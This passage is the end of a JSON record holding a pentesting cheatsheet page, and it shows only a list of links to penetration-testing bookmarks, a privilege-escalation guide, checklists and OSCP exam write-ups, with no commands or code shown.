resources.**\n\n[https://code.google.com/archive/p/pentest-bookmarks/wikis/BookmarksList.wiki](https://code.google.com/archive/p/pentest-bookmarks/wikis/BookmarksList.wiki)\n\n[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\n\n## **Pentest Checklist**\n\n[http://mateustymbu.xpg.uol.com.br/Bibliography/Pentest_Checklist.pdf](http://mateustymbu.xpg.uol.com.br/Bibliography/Pentest_Checklist.pdf)\n\n## **Pentesting Workflow**\n\n[https://workflowy.com/s/FgBl.6qcAQUUqWM](https://workflowy.com/s/FgBl.6qcAQUUqWM)\n\n## **OSCP Writeups, blogs, and notes:**\n\n[https://xapax.github.io/blog/2017/01/14/OSCP.html](https://xapax.github.io/blog/2017/01/14/OSCP.html)\n\n[http://www.securitysift.com/offsec-pwb-oscp/](http://www.securitysift.com/offsec-pwb-oscp/)\n\n[https://netsecfocus.com/topic/32/oscp-like-vulnhub-vms](https://netsecfocus.com/topic/32/oscp-like-vulnhub-vms)\n\n[https://blog.propriacausa.dewp-content/uploads/2016/07/oscp_notes.html](https://blog.propriacausa.de/wp-content/uploads/2016/07/oscp_notes.html)\n\n[https://localhost.exposed/path-to-oscp/](https://localhost.exposed/path-to-oscp/)\n\n[https://www.reddit.com/r/netsecstudents/comments/5i00w6/my_experience_with_the_oscp/](https://www.reddit.com/r/netsecstudents/comments/5i00w6/my_experience_with_the_oscp/)\n\n[https://naterobb.blogspot.com/2017/02/my-experience-with-oscp-to-kick-off-my.html](https://naterobb.blogspot.com/2017/02/my-experience-with-oscp-to-kick-off-my.html)\n\n[http://www.securitysift.com/offsec-pwb-oscp/](http://www.securitysift.com/offsec-pwb-oscp/)\n\n### Share this:\n\n- [Twitter](https://hausec.com/pentesting-cheatsheet/?share=twitter\u0026nb=1 \"Click to share on Twitter\")\n- [Facebook](https://hausec.com/pentesting-cheatsheet/?share=facebook\u0026nb=1 \"Click to share on Facebook\")\n\n### Like this:\n\nLike Loading...\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fanlominus%2Fkoth","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fanlominus%2Fkoth","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fanlominus%2Fkoth/lists"}